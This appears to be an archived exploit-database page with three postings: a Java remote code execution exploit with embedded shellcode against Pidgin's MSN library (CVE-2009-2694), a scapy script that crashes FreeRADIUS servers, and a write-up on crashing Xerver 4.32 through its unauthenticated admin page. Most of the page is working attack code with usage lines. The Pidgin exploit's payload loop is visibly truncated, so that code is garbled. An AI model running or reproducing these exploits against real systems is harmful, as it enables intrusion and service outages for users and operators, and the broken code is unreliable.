Tue, 10 Nov 2009 07:35:29 +0000

/*
* Pidgin MSN <= 2.5.8 Remote Code Execution
*
* Pierre Nogues - pierz@hotmail.it
* http://www.indahax.com/
*
*
* Description:
*        Pidgin is a multi-protocol Instant Messenger.
*
*        This is an exploit for the vulnerability[1] discovered in Pidgin by core-security[2].
*        The library "libmsn" used by pidgin doesn't handle specially crafted MsnSlp packets
*        which could lead to memory corruption.
*
* Affected versions :
*        Pidgin <= 2.5.8, Adium and other IM using Pidgin-libpurple/libmsn library.
*
* Plateforms :
*        Windows, Linux, Mac
*
* Fix :
*        Fixed in Pidgin 2.5.9
*        Update to the latest version : http://www.pidgin.im/download/
*
* References :
*        [1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-2694
*        [2] http://www.coresecurity.com/content/libpurple-arbitrary-write
*        [3] http://www.pidgin.im/news/security/?id=34
*
* Usage :
*        You need the Java MSN Messenger library : http://sourceforge.net/projects/java-jml/
*        javac.exe -cp "%classpath%;.\jml-1.0b3-full.jar" PidginExploit.java
*        java -cp "%classpath%;.\jml-1.0b3-full.jar" PdiginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL
*
*/

import net.sf.jml.*;
import net.sf.jml.event.*;
import net.sf.jml.impl.*;
import net.sf.jml.message.p2p.*;
import net.sf.jml.util.*;

public class PidginExploit {

   private MsnMessenger messenger;
   private String login;
   private String password;
   private String target;

   private int session_id = NumberUtils.getIntRandom();

   private byte shellcode[] = new byte[] {

           /*
            * if you use the stack in your shellcode do not forgot to change esp because eip == esp == kaboom !
            * sub esp,500
            */
               (byte) 0x81, (byte) 0xEC, (byte) 0x00, (byte) 0x05, (byte) 0x00, (byte) 0x00,


           /*
            * windows/exec - 121 bytes
            * http://www.metasploit.com
            * EXITFUNC=process, CMD=calc.exe
            */
               (byte) 0xfc, (byte) 0xe8, (byte) 0x44, (byte) 0x00, (byte) 0x00, (byte) 0x00, (byte) 0x8b, (byte) 0x45,
               (byte) 0x3c, (byte) 0x8b, (byte) 0x7c, (byte) 0x05, (byte) 0x78, (byte) 0x01, (byte) 0xef, (byte) 0x8b,
               (byte) 0x4f, (byte) 0x18, (byte) 0x8b, (byte) 0x5f, (byte) 0x20, (byte) 0x01, (byte) 0xeb, (byte) 0x49,
               (byte) 0x8b, (byte) 0x34, (byte) 0x8b, (byte) 0x01, (byte) 0xee, (byte) 0x31, (byte) 0xc0, (byte) 0x99,
               (byte) 0xac, (byte) 0x84, (byte) 0xc0, (byte) 0x74, (byte) 0x07, (byte) 0xc1, (byte) 0xca, (byte) 0x0d,
               (byte) 0x01, (byte) 0xc2, (byte) 0xeb, (byte) 0xf4, (byte) 0x3b, (byte) 0x54, (byte) 0x24, (byte) 0x04,
               (byte) 0x75, (byte) 0xe5, (byte) 0x8b, (byte) 0x5f, (byte) 0x24, (byte) 0x01, (byte) 0xeb, (byte) 0x66,
               (byte) 0x8b, (byte) 0x0c, (byte) 0x4b, (byte) 0x8b, (byte) 0x5f, (byte) 0x1c, (byte) 0x01, (byte) 0xeb,
               (byte) 0x8b, (byte) 0x1c, (byte) 0x8b, (byte) 0x01, (byte) 0xeb, (byte) 0x89, (byte) 0x5c, (byte) 0x24,
               (byte) 0x04, (byte) 0xc3, (byte) 0x5f, (byte) 0x31, (byte) 0xf6, (byte) 0x60, (byte) 0x56, (byte) 0x64,
               (byte) 0x8b, (byte) 0x46, (byte) 0x30, (byte) 0x8b, (byte) 0x40, (byte) 0x0c, (byte) 0x8b, (byte) 0x70,
               (byte) 0x1c, (byte) 0xad, (byte) 0x8b, (byte) 0x68, (byte) 0x08, (byte) 0x89, (byte) 0xf8, (byte) 0x83,
               (byte) 0xc0, (byte) 0x6a, (byte) 0x50, (byte) 0x68, (byte) 0x7e, (byte) 0xd8, (byte) 0xe2, (byte) 0x73,
               (byte) 0x68, (byte) 0x98, (byte) 0xfe, (byte) 0x8a, (byte) 0x0e, (byte) 0x57, (byte) 0xff, (byte) 0xe7,
               (byte) 0x63, (byte) 0x61, (byte) 0x6c, (byte) 0x63, (byte) 0x2e, (byte) 0x65, (byte) 0x78, (byte) 0x65,
               (byte) 0x00
           };

   // reteip = pointer to the return address in the stack
   // The shellcode will be wrote just before reteip
   // and reteip will automaticly point to the shellcode. It's magic !
   private int reteip = 0x0022CFCC;    //stack on XP SP3-FR Pidgin 2.5.8

   private int neweip;
   private byte[] payload = new byte[shellcode.length + 4];
   private int totallength = reteip + 4;

   public static void main(String[] args) throws Exception {

       if(args.length != 3){
           System.out.println("PidginExploit YOUR_MSN_EMAIL YOUR_PASSWORD TARGET_MSN_EMAIL");
       }else{
           PidginExploit exploit = new PidginExploit(args[0],args[1],args[2]);
           exploit.start();
       }

   }

   public PidginExploit(String login, String password, String target){
       this.login = login;
       this.password = password;
       this.target = target;

       neweip = reteip - shellcode.length ;

       for(int i=0;i> 8);
       payload[shellcode.length + 2] = (byte)((neweip & 0x00FF0000) >> 16);
       payload[shellcode.length + 3] = (byte)((neweip & 0xFF000000) >> 24);
   }

   public void start() {
       messenger = MsnMessengerFactory.createMsnMessenger(login,password);
       messenger.getOwner().setInitStatus(MsnUserStatus.ONLINE);

       messenger.setLogIncoming(false);
       messenger.setLogOutgoing(false);

       initMessenger(messenger);
       messenger.login();
   }

   protected void initMessenger(MsnMessenger messenger) {

   messenger.addContactListListener(new MsnContactListAdapter() {

           public void contactListInitCompleted(MsnMessenger messenger) {

               final Object id = new Object();

               messenger.addSwitchboardListener(new MsnSwitchboardAdapter() {

                   public void switchboardStarted(MsnSwitchboard switchboard) {

                       if (id != switchboard.getAttachment())
                           return;

                       switchboard.inviteContact(Email.parseStr(target));
                   }

                   public void contactJoinSwitchboard(MsnSwitchboard switchboard, MsnContact contact) {
                       if (id != switchboard.getAttachment())
                           return;

                       MsnP2PSlpMessage msg = new MsnP2PSlpMessage();
                       msg.setIdentifier(NumberUtils.getIntRandom());
                       msg.setSessionId(session_id);
                       msg.setOffset(0);
                       msg.setTotalLength(totallength);
                       msg.setCurrentLength(totallength);

                       // This flag create a bogus MsnSlpPacket in pidgin memory with a buffer pointing to null
                       // We'll use this buffer to rewrite memory in the stack
                       msg.setFlag(0x1000020);

                       msg.setP2PDest(target);

                       switchboard.sendMessage(msg);

                       System.out.println("First packet sent, waiting for the ACK");

                   }

                   public void switchboardClosed(MsnSwitchboard switchboard) {
                       System.out.println("switchboardClosed");
                       switchboard.getMessenger().removeSwitchboardListener(this);
                   }

                   public void contactLeaveSwitchboard(MsnSwitchboard switchboard, MsnContact contact){
                       System.out.println("contactLeaveSwitchboard");
                   }
               });
               messenger.newSwitchboard(id);
           }
       });

       messenger.addMessageListener(new MsnMessageAdapter(){

           public void p2pMessageReceived(MsnSwitchboard switchboard,MsnP2PMessage message,MsnContact contact) {

               //We receive the ACK of our first packet with the ID of the new bogus packet
               message.getIdentifier();

               MsnP2PDataMessage msg = new MsnP2PDataMessage(session_id, message.getIdentifier(), neweip,
                       payload.length, payload, target);

               switchboard.sendMessage(msg);
               System.out.println("ACK received && Payload sent !");
               System.out.println("Exploit OK ! CTRL+C to quit");

           }
       });



       messenger.addMessengerListener(new MsnMessengerAdapter() {

           public void loginCompleted(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " login");
           }

           public void logout(MsnMessenger messenger) {
               System.out.println(messenger.getOwner().getEmail() + " logout");
           }

           public void exceptionCaught(MsnMessenger messenger,
                   Throwable throwable) {
               System.out.println("caught exception: " + throwable);
           }
       });

   }
}

Source: http://www.milw0rm.com/exploits/9615

Freeradius < 1.1.8 Remote Packet Of Death Exploit (Cve-2009-3111)

Tue, 10 Nov 2009 07:34:23 +0000

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11
# Requires RadiusAttr http://trac.secdev.org/scapy/attachment/ticket/92/radiuslib.py
# http://www.braindeadprojects.com/blog/what/freeradius-packet-of-death/

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
	print "Usage: radius_killer.py \n"
	sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
	Radius(code=1,authenticator="\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99",id=180)/ \
	RadiusAttr(type=69,value="",len=2)

send(PoD)

Source: http://www.milw0rm.com/exploits/9642

Xerver Http Server 4.32 Remote Denial Of Service Vulnerability

Tue, 10 Nov 2009 07:33:11 +0000

#################################################################################
#                                                                   	     	#
# [b]Xerver HTTP Server <= v4.32 Remote Denial of Service[/b]	 		        #
# Found By:	Dr_IDE				                                #
# Download:	http://www.javascript.nu/xerver                          	#
# Tested On:	Windows XPSP3                                            	#
#                                                                        	#
#################################################################################

- Description -

Xerver v4.32 is a Windows based HTTP server. This is the latest version of
the application available.

Xerver v4.32 is vulnerable to a remote denial of service through following means.

Xerver ships with a web based configuration program, essentially making this DoS
remote if and when the Remote Setup is running.

The admin package runs on port 32123 and does not require any form of 
authentication to make changes to the server configuration.

- Bug -

If the HTTP Server port is set to any kind of letter combination, the server will
crash and be unable to be restarted unless the configuration file is manually
edited to remove the letters and put back to a number (ie. 80).

- Example -

1. http://172.16.2.101:32123/?action=wizardStep1
2. Enter anything in the port field, "Dr_IDE"
3. Click Save and Continue

- Results - 

The server will crash hard, and you will be unable to restart it. You must edit the 
configuration file, Xerver2.cfg and replace the first line of the file with a Port
number.

- Note - 

I tried to make this a possible XSS attack but I couldn't manage. Perhaps someone 
else can figure it out.

Methods and variables of interest for this attack:

SubmitForm()
document.myForm.portNR.value="80" # default, any letters here would kill the server